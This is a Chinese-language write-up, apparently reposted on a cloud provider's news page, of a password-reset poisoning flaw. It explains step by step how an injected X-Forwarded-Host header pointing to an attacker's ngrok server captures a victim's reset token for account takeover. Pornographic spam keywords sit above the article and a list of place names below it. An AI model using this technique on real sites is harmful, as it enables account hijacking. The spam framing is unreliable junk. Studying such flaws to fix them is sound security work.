亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持

發布時間:2021-12-18 15:13:10 來源:億速云 閱讀:311 作者:柒染 欄目:安全技術

今天就跟大家聊聊有關怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

通過利用目標網站“忘記密碼”功能,在重置密碼請求發包中添加X-Forwarded-Host主機信息,欺騙目標網站把重置密碼的鏈接導向到自己的服務器,從而實現對受害者賬戶的完全劫持。

這里,基于保密原因,先假設目標測試網站為redacted.com,在對其測試過程中,我把重點放到了它的“忘記密碼”功能處。經過了6個小時的折騰,我發現了其中存在一個非常有意思的漏洞,利用該漏洞可以實現對目標受害者的完全賬戶劫持。

發現過程

所需工具:BurpSuite、Ngrok Server。Ngrok服務可以將自己本地PC映射到云上的Server公網,目的為將本地PC變成與外部網絡交流的終端服務器,間接把云上的Server則變成外網與內網PC之間的中轉代理。

1、訪問目標網站的忘記密碼功能,在其中輸入用戶名信息請求獲得重置密碼鏈接:https://redacted.com/users/forgot_password,Notice:之后目標網站會往你的注冊郵箱發送一個重置密碼鏈接。

2、在上過程中,用BurpSuite開啟Web抓包,請求包情況如下:

怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持

從中我們添加一個X-Forwarded-Host: bing.com來嘗試,看看目標網站是否會把這個重置密碼鏈接包含進bing.com;

X-Forwarded-For(XFF)是用來識別通過HTTP代理或負載均衡方式連接到Web服務器的客戶端最原始的IP地址的HTTP請求頭字段。 Squid 緩存代理服務器的開發人員最早引入了這一HTTP頭字段,并由IETF在HTTP頭字段標準化草案[1]中正式提出。具體點此處參考。

3、這里,我們打開郵箱,查看目標網站發送過來的密碼重置鏈接長啥樣,哇,從發來的郵件中我們可以看到,其中包含了用戶Token信息的密碼重置鏈接,大致樣子如下:

https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持

就這樣,我們可以認為我的密碼重置Token信息已經轉發給bing.com了,這里需要對這個Token做個真實驗證,所以,我們可以把密碼重置鏈接中的https://bing.com替換成目標網站的https://redacted.com;

4、果然,我們打開了一個能真正實施重置密碼的頁面!

漏洞利用

根據以上操作和存在的問題,我可以構造網絡架構來劫持用戶相關信息。步驟如下:

1、通過ngrok服務架設 Attacker服務器;

2、開啟Burpsuite抓包,在目標網站的“忘記密碼”處輸入受害者用戶名信息,執行密碼重置確定操作;

3、在Burpsuite抓到的密碼重置請求包中,添加Attacker服務器,格式如:

X-Forwarded-Host: ngrok.io

其中ngrok.io為Attacker服務器的域名地址。如:

怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持

4、 因此,當受害者郵箱收到目標網站發送的密碼重置鏈接中就會包含Attacker服務器的域名地址,如:

http://ngrok.io/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

當受害者一不小心點擊了該鏈接之后,就會帶著其用戶密碼重置Token去請求Attacker服務器ngrok.io(這里需要與用戶的交互動作);

5、在受害者點開上述鏈接的同時,在Attacker服務器ngrok.io這邊,攻擊者看到的將會是包含受害者用戶密碼重置Token的一個請求信息,如下:

怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持

6、到此,攻擊者獲得了受害者用戶的密碼重置Token之后,把Attacker服務器ngrok.io替換成目標網站https://redacted.com,加上后續的受害者用戶的密碼重置Token,就可成功對受害者賬戶的重置密碼,實現對其賬戶的完全劫持。

看完上述內容,你們對怎么在密碼重置請求包中添加X-Forwarded-Host實現受害者賬戶完全劫持有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

新泰市| 新巴尔虎左旗| 贵州省| 咸宁市| 新化县| 诸暨市| 开封市| 丹凤县| 罗平县| 永靖县| 杭锦后旗| 邯郸市| 梅州市| 太谷县| 合山市| 南昌市| 咸宁市| 拜城县| 台南市| 临泽县| 巴林左旗| 奉节县| 荔波县| 肇庆市| 罗田县| 扶余县| 嘉祥县| 巴彦淖尔市| 卢氏县| 镇沅| 河池市| 社旗县| 西安市| 黄平县| 启东市| 伊春市| 乌兰浩特市| 屏南县| 达拉特旗| 县级市| 贵南县|